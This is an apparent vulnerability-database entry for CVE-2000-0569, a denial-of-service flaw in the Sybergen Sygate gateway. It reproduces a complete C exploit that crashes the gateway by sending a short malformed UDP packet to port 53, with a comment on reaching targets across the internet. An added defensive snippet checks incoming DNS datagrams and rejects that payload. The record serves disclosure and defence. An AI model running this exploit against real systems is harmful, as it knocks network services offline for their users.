Sybergen Sygate Denial-of-Service Vulnerability

Vulnerability ID: 1105903    Vulnerability type: Unknown
Published: 2000-06-30    Updated: 2005-05-02
CVE ID: CVE-2000-0569    CNNVD-ID: CNNVD-200006-118
Platform: Windows    CVSS score: 5.0
|Vulnerability sources
https://www.exploit-db.com/exploits/20051
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200006-118
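|Vulnerability details
A vulnerability exists in Sybergen Sygate. A remote attacker can cause a denial of service by sending a malformed DNS UDP packet to the internal interface.
|Exploit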
source: http://www.securityfocus.com/bid/1420/info

An exploit which causes a Denial of Service to Sybergen's Sygate when run from an internal machine has been released. The exploit sends a UDP packet to port 53 of the gateway. 

//Sygate Crash by: marc@eeye.com (April-00)
//http://www.eEye.com
//Will crash Sygate (http://www.sygate.com/) when ran from the internal LAN.
//Play with source routing to get it to work across the internet.
//Just hit the Internal IP of the Sygate machine.

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <arpa/inet.h>

int main (int argc, char **argv)
{
        int SockFD, addrlen, bsent;
        struct sockaddr_in UDPSock;
        char bomb[]= "changeiscoming";

        printf("Sygate Crash by: marc@eeye.com\n");
        printf("http://www.eEye.com\n\n");

        if(argc<2){
                printf("Usage: %s [server]\n",argv[0]);
                exit(1);
        }

        SockFD=socket(AF_INET, SOCK_DGRAM, 0);

        UDPSock.sin_family=AF_INET;
        UDPSock.sin_addr.s_addr=inet_addr(argv[1]);
        UDPSock.sin_port=htons(53);

        bsent=sendto(SockFD,&bomb,13,0,(struct sockaddr *) &UDPSock,
                     sizeof(struct sockaddr_in));

        printf("Sent Crash.\nBytes Sent: %i\n",bsent);
}
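
Added example (not part of the original advisory or exploit, and not Sygate code): a conservative structural check that a UDP port 53 listener can apply before parsing a datagram as a DNS query. The page does not state why the packet crashes Sygate, so this does not describe the vendor's fix; the function and sample names are hypothetical, and the 13-byte sample is the payload sent by the code above.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#define DNS_HDR_LEN 12   /* fixed DNS header size (RFC 1035) */

/* Constructed samples: the 13 payload bytes sent by the code above, and a
 * well-formed query for example.com, type A, class IN. */
static const uint8_t SAMPLE_PAGE_PAYLOAD[13] = {
    'c','h','a','n','g','e','i','s','c','o','m','i','n' };
static const uint8_t SAMPLE_QUERY[] = {
    0x12,0x34, 0x01,0x00, 0,1, 0,0, 0,0, 0,0,
    7,'e','x','a','m','p','l','e', 3,'c','o','m', 0, 0,1, 0,1 };

static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Hypothetical helper: 1 if buf is a structurally plausible DNS query,
 * 0 if it should be dropped before any further parsing. */
int dns_query_is_sane(const uint8_t *buf, size_t len)
{
    size_t off = DNS_HDR_LEN, name_len = 0;
    if (buf == NULL || len < DNS_HDR_LEN)
        return 0;                          /* shorter than the header */
    if (rd16(buf + 2) & 0x8000)
        return 0;                          /* QR set: a response, not a query */
    if (rd16(buf + 4) != 1 || rd16(buf + 6) != 0 || rd16(buf + 8) != 0)
        return 0;                          /* expect 1 question, no answer/authority */
    for (;;) {                             /* walk QNAME labels with bounds checks */
        uint8_t l;
        if (off >= len)
            return 0;                      /* name runs past the datagram */
        l = buf[off++];
        if (l == 0)
            break;                         /* root label ends the name */
        if (l > 63 || l > len - off)
            return 0;                      /* pointer/reserved type, or truncated label */
        name_len += (size_t)l + 1;
        if (name_len > 254)
            return 0;                      /* 255-octet name limit incl. root label */
        off += l;
    }
    return len - off >= 4;                 /* QTYPE + QCLASS must follow */
}

int main(void)
{
    printf("page payload: %d\n", dns_query_is_sane(SAMPLE_PAGE_PAYLOAD, sizeof SAMPLE_PAGE_PAYLOAD));
    printf("valid query:  %d\n", dns_query_is_sane(SAMPLE_QUERY, sizeof SAMPLE_QUERY));
    return 0;
}
```

Rejecting compression pointers in the question name is a deliberately strict choice for a forwarder that only expects ordinary client queries.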
|References

Source: BID
Name: 1420
Link: http://www.securityfocus.com/bid/1420
Source: WIN2KSEC
Name: 20000630 Any LAN user can crash Sygate
Link: http://archives.neohapsis.com/archives/win2ksecadvice/2000-q2/0189.html
Source: XF
Name: sygate-udp-packet-dos(5049)
Link: http://xforce.iss.net/static/5049.php